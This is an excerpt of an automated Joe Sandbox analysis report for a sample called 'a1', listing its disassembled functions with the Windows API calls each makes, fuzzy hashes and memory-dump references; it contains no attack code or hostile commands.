                                                                                                                                                                                                                                                                          • API ID: FileTempWow64$DeleteDisableErrorLastNamePathRedirection
                                                                                                                                                                                                                                                                          • String ID: Shlwapi.dll
                                                                                                                                                                                                                                                                          • API String ID: 145603228-1687636465
                                                                                                                                                                                                                                                                          • Opcode ID: a724ed0d8a0be5cb6f192d72e5d6888f1b9d5839da20bc4d4eb6fb660a351b0c
                                                                                                                                                                                                                                                                          • Instruction ID: 6fd57661c62060cbaccbdc959d20870b424f653fa026ec74cdd3167fb0b605b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a724ed0d8a0be5cb6f192d72e5d6888f1b9d5839da20bc4d4eb6fb660a351b0c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E231AD72D10209EBCB05CFA5CD44BEEBBBCFF18350F14412AE815A7291DB359914CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 002F4245
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 002F4299
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseFreeHandleLibrary
                                                                                                                                                                                                                                                                          • String ID: t=
                                                                                                                                                                                                                                                                          • API String ID: 10933145-4144653439
                                                                                                                                                                                                                                                                          • Opcode ID: a80349ac0b5467257d57903e37fbcd3d99cc34d4d9ed063b04fbb43a27b22de1
                                                                                                                                                                                                                                                                          • Instruction ID: a501b55088fba24e57c77a2278f72ab66f23e5bb09cd223c62b00025c02ba9e0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a80349ac0b5467257d57903e37fbcd3d99cc34d4d9ed063b04fbb43a27b22de1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F72159B1604705AFD700CF6AED58B66BBE8FB04716F000229E914C73A1DBB8E910CB94
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008,?,001C5767,?,?,001C5514,?), ref: 00348EF6
                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,001C5514,?), ref: 00348EFD
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,001C5514,?), ref: 00348F43
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,001C5514,?), ref: 00348F4A
                                                                                                                                                                                                                                                                            • Part of subcall function 00348D8F: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00348F39,00000000,?,?,001C5514,?), ref: 00348DB3
                                                                                                                                                                                                                                                                            • Part of subcall function 00348D8F: HeapAlloc.KERNEL32(00000000,?,?,001C5514,?), ref: 00348DBA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1864747095-0
                                                                                                                                                                                                                                                                          • Opcode ID: 17195c034c2c7cab67f84915614fb70d1e3bc79047baaa7f6febf313f5a44b27
                                                                                                                                                                                                                                                                          • Instruction ID: 816c21f98af7f07007989d27359cbd9a5d74e628341841880d2704a84e366088
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17195c034c2c7cab67f84915614fb70d1e3bc79047baaa7f6febf313f5a44b27
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F02472A0572187CB232BF87C0CE5E2ADEAF80792B114428F509CE540DF20FC058B60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,00000000,00000000,?,DF534560,?,00000000), ref: 001BFA32
                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,00000000), ref: 001BFC45
                                                                                                                                                                                                                                                                            • Part of subcall function 001BF9C0: DeleteFileW.KERNEL32(?), ref: 001BFC8F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$DeleteMoveNameTemp
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 788073729-0
                                                                                                                                                                                                                                                                          • Opcode ID: 80cabe4d5b9a7994ed19145ee492d8f508b92da3ee9ae7801e8aa7f6fe3066a4
                                                                                                                                                                                                                                                                          • Instruction ID: cebef488361e5ca9b932ed69721e937621bcfea98d6b40bbb1add06f9947e347
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80cabe4d5b9a7994ed19145ee492d8f508b92da3ee9ae7801e8aa7f6fe3066a4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C16770C14268DADB24DF68CD987DDBBB4BF64304F1042D9D409A7291EBB56B88CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00362EEA
                                                                                                                                                                                                                                                                            • Part of subcall function 00361737: RtlAllocateHeap.NTDLL(00000000,00369290,?,?,00369290,00000220,?,?,?), ref: 00361769
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00362EFF
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00362F0F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __freea$AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243444508-0
                                                                                                                                                                                                                                                                          • Opcode ID: e878aed470dd3954dfe1a7b99a20dc218605b283df0ad3c6289edcacef3e5e9b
                                                                                                                                                                                                                                                                          • Instruction ID: 419132634b6aaf85d398679dbbe7dd947e8fb84e7e2a91076869484d77faec2c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e878aed470dd3954dfe1a7b99a20dc218605b283df0ad3c6289edcacef3e5e9b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E851B572600A16AFEB229F64CC81EBB7AA9EF44354F1B8139FD04DB158EB31DD109760
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000,DF534560,?,?), ref: 002D8747
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 002D8854
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                          • Opcode ID: 38bb6732e9b54c3e96135397628d9f046fd5cc2f15eeadb5417a29763cc93e0d
                                                                                                                                                                                                                                                                          • Instruction ID: 6bc23240d1dc5ff77474294636fbc5b4db48c5d310ef6a32cbd2bc0d690af9b9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38bb6732e9b54c3e96135397628d9f046fd5cc2f15eeadb5417a29763cc93e0d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A617F71D00609AFDB05DFA8C945BDDFBB4FB09320F14836AE925A7390DB75AA14CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,DF534560,?,00000000,?,80004005,?,00000000), ref: 002D5D0E
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 002D5D46
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 002D5DDF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CreateFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1722934493-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8680aa9def4c77cebc1f07703b7eb06a24130baf7edee61ff065d4f3d86baeb0
                                                                                                                                                                                                                                                                          • Instruction ID: 09ea5316a49dbbf898c2e5aba59c71c362f798827d688bc4e8bc698165ac4c03
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8680aa9def4c77cebc1f07703b7eb06a24130baf7edee61ff065d4f3d86baeb0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8651B371A10A169FDB10EF68C845B9AF7B5FF44320F10866EE529973D0EB71AD11CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • PathIsUNCW.SHLWAPI(?,AA831995,?,00000000,?,00000010,00000000,?,?,AA831995,?,00000000), ref: 6A565779
                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,6A5B7184,00000001,?,00000000,?), ref: 6A565827
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6A565831
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLastPath
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 953296794-0
                                                                                                                                                                                                                                                                          • Opcode ID: 91dc5a16de59bc361a5e9a8565b1f6f6c1662e81c7098353763fc06571eacc9c
                                                                                                                                                                                                                                                                          • Instruction ID: feb7a11cf69d1d8332b7c9de163e2f6e1c8eda6d13f9008d299a6273cdcf9b59
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91dc5a16de59bc361a5e9a8565b1f6f6c1662e81c7098353763fc06571eacc9c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1651C031A00609DBDB01DFA8C848BDDFBB4FF45324F1542A9E515A72A2DF31AD05CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?,AA831995,?,?,?,?,6A59E8A6,000000FF), ref: 6A565DB6
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?,AA831995,?,?,?,?,6A59E8A6,000000FF), ref: 6A565DD2
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?,AA831995,?,?,?,?,6A59E8A6,000000FF), ref: 6A565DF1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseHandleInternet
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1081599783-0
                                                                                                                                                                                                                                                                          • Opcode ID: a80e3d94b476c0d1f3d154482f58d972111bcddeefded708e9de2a5f0787305e
                                                                                                                                                                                                                                                                          • Instruction ID: f628ce4a149bdb0e074d1a685809ab28f46d2b67c36ef279bdf6462493ab4cdd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a80e3d94b476c0d1f3d154482f58d972111bcddeefded708e9de2a5f0787305e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D1182B1900708ABD720CF59C805B4BFBF8EF15710F014A1EE862D7791DBB5EA048B90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0035E9E7,?,?,?,?,DF534560), ref: 0035E9FE
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0035E9E7,?,?,?,?,DF534560), ref: 0035EA05
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0035EA17
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                          • Opcode ID: f9c5b23609a17e9d66df6261f26a799dd8eb9759840fc599f1efa4f297ad6509
                                                                                                                                                                                                                                                                          • Instruction ID: 7fc5ba87bed353165a0c2743fd0c068e8400fc97c5f25f405c6668ac2c4c5f41
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c5b23609a17e9d66df6261f26a799dd8eb9759840fc599f1efa4f297ad6509
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76D06C31010208ABCF176FB0DC1EC9A7F2ABA41346B055510F90E9A132CB31AA9A9B80
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _wcsrchr
                                                                                                                                                                                                                                                                          • String ID: .msi
                                                                                                                                                                                                                                                                          • API String ID: 1752292252-299543723
                                                                                                                                                                                                                                                                          • Opcode ID: 8fdc782b9df0a3645f0723323a2d81763e4160859a2a7364a8cf18aa92cba692
                                                                                                                                                                                                                                                                          • Instruction ID: 3fd74604b81be2e5e8a116da8a65806efeef25d3b838c9f95588594be26dd8b4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fdc782b9df0a3645f0723323a2d81763e4160859a2a7364a8cf18aa92cba692
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E1D171A1064A9FDB14CF68C848BAEB7B5FF14314F14866AE821AB391D774ED24CF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 002CE310: GetTickCount.KERNEL32 ref: 002CE394
                                                                                                                                                                                                                                                                            • Part of subcall function 002CE310: __Xtime_get_ticks.LIBCPMT ref: 002CE39C
                                                                                                                                                                                                                                                                            • Part of subcall function 002CE310: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002CE3E6
                                                                                                                                                                                                                                                                            • Part of subcall function 002EF190: GetLastError.KERNEL32 ref: 002EF224
                                                                                                                                                                                                                                                                            • Part of subcall function 002EF190: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 002EF2A2
                                                                                                                                                                                                                                                                            • Part of subcall function 002EF190: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000,00000000,00000000), ref: 002EF2EC
                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 002CE5E1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnvironmentVariable$CountErrorInit_thread_footerLastTickUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                          • String ID: \/:*?"<>|
                                                                                                                                                                                                                                                                          • API String ID: 1610684550-3830478854
                                                                                                                                                                                                                                                                          • Opcode ID: 25fdf2e784be864ec53a2008ce7d1004d6cf58cfd34d0f9abe3d8c62c8274971
                                                                                                                                                                                                                                                                          • Instruction ID: 00a5936fcd3e136cd17a84087b5ebae72546becca1a2ebe9f8df0b92d2ee9adb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25fdf2e784be864ec53a2008ce7d1004d6cf58cfd34d0f9abe3d8c62c8274971
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BE19B70D10258DFDB20DF68C855BEEBBB4BF65304F1442ADD409AB282DBB46A48CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,DF534560,?,00000010,?,?,0037422E,000000FF), ref: 002F0EF8
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                            • Part of subcall function 002F0D10: ConnectNamedPipe.KERNEL32(?,00000000,DF534560,?,000000FF,?,?,00000000,003BABD6,000000FF,?,002F0F2A,000000FF,?,00000001), ref: 002F0D4C
